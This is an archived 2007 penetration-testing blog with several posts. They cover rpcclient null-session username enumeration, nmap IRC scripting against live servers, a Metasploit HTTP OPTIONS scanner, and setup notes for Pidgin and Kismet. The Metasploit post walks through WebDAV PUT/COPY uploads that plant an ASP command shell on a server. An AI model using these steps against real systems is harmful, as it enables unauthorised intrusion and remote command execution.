carnal0wnage [Shared Reader]

Wednesday, August 29, 2007

More of using rpcclient to find usernames

So say you are given the assignment of doing an audit in a non-english speaking country. you are at a minimum going to have to locate how they spell administrator in the country in question. if google doesnt help you or gives you multiple options (like it did me this time) if you can find a box running samba or with file and printer sharing enabled and shared to the world (like you arent supposed to do) then you can use rpcclient to pull out the usernames with a null session

null sessions still rule in 2007...

cg@segfault:~$ rpcclient -U "" x.x.3.96
Password:
rpcclient $> lsaenumsid
found 11 SIDs
S-1-5-6
S-1-5-32-551
S-1-5-32-547
S-1-5-32-545
S-1-5-32-544
S-1-5-21-2000478354-1708537768-1957994488-501 <--guest
S-1-5-21-2000478354-1708537768-1957994488-500 <--administrator
S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-1-0
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-501
S-1-5-21-2000478354-1708537768-1957994488-501 NSL09\Convidado (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)
rpcclient $> lookupnames Administrador
Administrador S-1-5-21-2000478354-1708537768-1957994488-500 (User: 1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-503
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-504
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-505
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-506
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1000
S-1-5-21-2000478354-1708537768-1957994488-1000 NSL09\TsInternetUser (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1001
S-1-5-21-2000478354-1708537768-1957994488-1001 NSL09\IUSR_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1002
S-1-5-21-2000478354-1708537768-1957994488-1002 NSL09\IWAM_NSL09 (1)
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1003
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-2000478354-1708537768-1957994488-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> exit


There you have it:

rpcclient rpcclient $> lgt; lookupsids S-1-5-21-2000478354-1708537768-1957994488-500
S-1-5-21-2000478354-1708537768-1957994488-500 NSL09\Administrador (1)

oh and thanks for the name of the box too :-)


fun rpcclient info: http://uw714doc.sco.com/en/samba/rpcclient.1.html

-CG

Nmap's ircServerInfo script

I installed nmap's latest SoC (Summer of Code) v6 release yesterday. Lots of new features and functionality especially Umit, the new GUI and NSE, the nmap scripting engine. http://insecure.org/nmap/man/man-nse.html
I was really curious about the ability to script nmap to perform different types of scans, vulnerability detection, version detection, etc...

One of scripts that comes with nmap was of particular interest to me. ircServerInfo.nse. I've been spending a lot of time playing "whack-a-bot", my version of "whack-a-mole" and it's annoying to have to track and confirm that the box is connecting to a Command & Control Server, so a quick and possibly automated way to do some basic checks of the remote IP would save me a lot of grunt work. While botnets are getting more and more advanced and are using different protocols, peer to peer, fast flux DNS and HTTP to remain up there are still a huge number of botnets that rely on good 'ol IRC. I'll cover fast flux dns botnets in an upcoming post. Very interesting stuff all of which is making these botnets more and more resilient to takedown.

Often I'll want details from the server itself while building information on the botnet so I can either send it to the server/desktop group in charge of that box or just keep it for my records and research.

One warning before running this against random IRC C&C servers. The script gets information from IRC servers by issuing STATS, LUSERS, etc queries, so it is actively connecting to the servers. It also let's the server operator know that you were there. :)
sd:send("USER nmap +iw nmap :Nmap Wuz Here\nNICK " .. curr_nick .. "\n") <--Snippet of code from the script. Now having been testing this script with various IRC servers, I have noticed that the results are somewhat varied.

C:\tools\nmap>nmap -sC --script=ircServerInfo.nse 140.211.xxx.xxx

Starting Nmap 4.22SOC6 ( http://insecure.org ) at 2007-08-29 20:31 Eastern Daylight Time
Interesting ports on xxxxxxx.freenode.net (140.211.xxx.xxx):
Not shown: 1694 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp closed http
113/tcp closed auth
443/tcp closed https
6666/tcp open irc-serv
6667/tcp open irc
| IRC Server Info: Server: xxxxx.freenode.net
| Version: hyperion-1.0.2b(382). xxxxx.freenode.net
| Lservers/Lusers: 0/2882
| Uptime: 48 days, 21:40:26
| Source host:xxxxxxxxxx.com
|_ Source ident: OK n=nmap
7000/tcp open afs3-fileserver
7070/tcp open realserver
8000/tcp open http-alt

As you can see it returns some very interesting and valuable information. I could have specified the particular port that the server was running on to exclude the additional information.

Let's have a look at another one:

C:\tools\nmap>nmap -sC --script=ircServerInfo.nse xxxx.undernet.org

Starting Nmap 4.22SOC6 ( http://insecure.org ) at 2007-08-30 09:52 Eastern Daylight Time
Interesting ports on xxx.xxxxxxx.com (69.16.xxx.xxx):
Not shown: 1701 filtered ports
PORT STATE SERVICE
5555/tcp open freeciv
6666/tcp open irc-serv
6667/tcp open irc
| IRC Server Info: Server: xxxx.undernet.org
| Servers/Ops/Chans/Users: 28/77/34161/112880 <-- A lot of "users" pwnt!
|_ Lservers/Lusers: 1/11690
7000/tcp open afs3-fileserver

Depending on the server the amount of information varies.

My next test on a server running on a different port seemed to fail and returned no data from the server at all.

C:\tools\nmap>nmap -sC --script=ircServerInfo.nse 85.248.xxx.xxx -p80

Starting Nmap 4.22SOC6 ( http://insecure.org ) at 2007-08-30 10:09 Eastern Daylight Time
Interesting ports on 85.248.115.244:
PORT STATE SERVICE
80/tcp open http

Odd, I know that there is an IRC server listening on TCP/80. Let's see what nmap's service detection tells me:

PORT STATE SERVICE VERSION
80/tcp open irc Unreal ircd
Service Info: Host: irc.foonet.com <-- See! Let's try something else:

C:\tools\wget>WGET 85.248.xxx.xxx
--23:10:19-- http://85.248.xxx.xxx/
=> `index.html'
Connecting to 85.248.115.244:80... connected.
HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9
Length: unspecified
[ <=>] 440 52.00B/s
23:10:55 (12.60 B/s) - `index.html' saved [440]

Interesting result that. Lets see what the index.html contains:

xxx.foonet.com NOTICE AUTH :*** Looking up your hostname...
xxx.foonet.com NOTICE AUTH :*** Found your hostname
xxx.foonet.com 451 GET :You have not registered
xxx.foonet.com 451 User-Agent: :You have not registered
xxx.foonet.com 451 Accept: :You have not registered
xxx.foonet.com 451 Host: :You have not registered
xxx.foonet.com 451 Connection: :You have not registered

So it definitely is an IRC server. Why did the nmap scan not return that information to me? Let's take another quick look at the script.

portrule = shortport.port_or_service(6667, "irc") <-- that might explain it.

It appears that it is only checking the standard IRC port of tcp/6667. That's no good. I guess the options would be to modify the script to use the -p option for input or, as a quick test, to change the port and service. Let's try that.

Interesting ports on 85.248.xxx.xxx:
PORT STATE SERVICE
80/tcp open httP

Still no luck! Well this is going to take some more looking into. Annoying to say the least. It might be that it's checking for certain headers, referrers, etc... Or it might be a irc daemon that is not supported by the script but according to the author's post on nmap-dev it currently supports ratbox, ircnet, bahamut and unreal. I'm a little short on time at the moment but I will see if I can come up with an answer to this.

So, while it is not perfect the script has a lot of value. I highly recommend looking in the ../scripts directory at all the current scripts. There are about 30 or so.

Cheers,
Dean

Sunday, August 26, 2007

BackTrack2 is NOT an operating system!!!

ok over on EH.net there are a couple of running threads on installing backtrack to Hard Disk/Drive so people can use BackTrack2 as their Operation System.

here is one of them link; i dont feel like looking up the rest (really not the point) but this has been going on for some time now (really since BT1).

OK i am going to vent for just a sec but i do have a point...

BACKTRACK IS NOT AN OPERATING SYSTEM! it is a TOOL!!

yes obviously you can run it as an operating system (hence the whole point of the rant) but why do your NEED to do that?

frankly the best education comes from building your own attack platform on the linux distro you installed, configured, and hardened yourself. You install, configure and mess with the tools YOU need to do your pentesting (or scanning your local ISP subnet) and dont have a bunch of extra crap you dont need. You get to work through library issues and crap breaking and getting so pissed at your box that you want to dropkick it out the window but guess what, you LEARN doing all that.

one of the biggest things i see over at LSO and during the rootwars is people having weak linux skills and not being able to compile and use their own tools, so naturally we ask what distro the run and mos of the time i get backtrack for an answer :-(

Dont get me wrong, i like backtrack2 as a TOOL, i boot the ISO in VMware i do what i need to do then i go back to my linux distro to read email and everything else. I have a couple of personal reasons for that one of them being denialability with the non-persistent option :-) but mostly for the reasons above; if i am going to go thru the trouble of installing a distro I might as well get something out of the install (linux knowledge-wise) instead of letting someone else do all the work for me.

just my thoughts on it. spend that effort installing that great set of tools that backtrack comes with on your own, you'll learn more and really get an idea if you actually NEED all of those tools and you get satisfaction of having control over your linux install.

-CG

Thursday, August 23, 2007

Should I be flattered or worried...

so I was playing on my linkedin account and checked the "who has viewed your profile" option. one category caught my eye. not sure if I should be flattered or worried that someone from the ministry of defense is taking a looksee...


Sunday, August 19, 2007

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module i wanted to see if i could get one going that would be pull down the HTTP Verbs allowable on a web server.

Basically i wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0


HTTP/1.1 200 OK

Connection: close

Date: Sun, 19 Aug 2007 05:18:55 GMT

Server: Microsoft-IIS/6.0

MicrosoftOfficeWebServer: 5.0_Pub

X-Powered-By: ASP.NET

Content-Length: 0

Accept-Ranges: bytes

DASL:

DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Cache-Control: private


cg@segfault:~/evil/msf3$

but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.

**more on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...

**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldnt get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

from there you will want to upload your cmd.asp so you can execute commands on the box.


Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)



Interacting with out cmdx.aspx to list the directory contents of the C drive


-CG

Sunday, August 12, 2007

Getting the SILC plugin to work with pidgin on ubuntu 7.04

maybe its common knowledge to everyone else, but since i couldnt find a good answer with google i'll post up how i got the silc plugin and googletalk to work with pidgin on ubuntu 7.04.

first ubuntu has some stupid ass permissions on alot of stuff and you have to use sudo for everything, i'm still undecided if ubuntu is staying around, but this can even cause you to be unable to read files and folders that you own (like i said stupid)

well when you start up pidgin as your user account everything works pretty good, except when you try to run your silc module. you'll probably get a "cant create silc key pair" error. googling wont do you much good, and you'll look where it tells you the key is /home/$userid/.silc/public_key.pub & private_key.prv and you wont have any keys there. Copying keys over from another silc client. wont work.

so the fix is to run pidgin as root so it will generate the keys for you.

cg@segfault:~$ sudo pidgin
Password:
Public key has been saved into `/root/.silc/public_key.pub'.
Private key has been saved into `/root/.silc/private_key.prv'
.


after that, copy those new spiffy keys from /root/ to your home directory

cg@segfault:~$ sudo su
root@segfault:/home/cg# cp /root/.silc/public_key.pub /home/cg/.silc/
root@segfault:/home/cg# cp /root/.silc/private_key.prv /home/cg/.silc/


things should work after that.

i also had issues with ssl support, google actually helped out this time and i found

http://developer.pidgin.im/wiki/FAQssl

you need to compile with the libgnutls package.


sudo apt-get install libgnutls-dev

then recompile from source

./configure --enable-gnutls

MSN and GoogleTalk should work after that.

Wednesday, August 8, 2007

Playing with Kismet

A few people know i am recovering from my iBook dying.

of course like a jackass, i wasnt backing up properly which is kind of a bummer but sometimes its always nice to start fresh, but if any of you ever sent me an email i wanted to keep, can you please resend it :-)

anyway, the silver lining of all of this is i got a new lappy (Toshibia A135-S4727) with a built in atheros card so i can finally use that hacking exposed wireless book i borrowed from work (and wont be returning) and can play with some of the wireless hack tools. I'm running Ubuntu 7.04 so it was fairly easy to get things up an running. A couple quick apt-get's and a little editing of the kismet conf file and i was up and running.

$sudo apt-get install madwifi-tools
$sudo apt-get install kismet


after you install the madwifi tools you should see the wifi0 interface when you do an ifconfig

wifi0 Link encap:UNSPEC HWaddr 00-19-7E-8A-BB-F4-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1399800 errors:113005 dropped:98619 overruns:0 frame:1332679
TX packets:98112 errors:2 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:199
RX bytes:283152996 (270.0 MiB) TX bytes:12557358 (11.9 MiB)
Interrupt:16


change directories into /etc/kismet and edit the kismet.conf file to use the madwifi_ag drivers

source=madwifi_ag,wifi0,Atheros

after that you should be good to go:

$sudo kismet










Links

http://www.kismetwireless.net/


http://www.wi-fiplanet.com/tutorials/article.php/3595531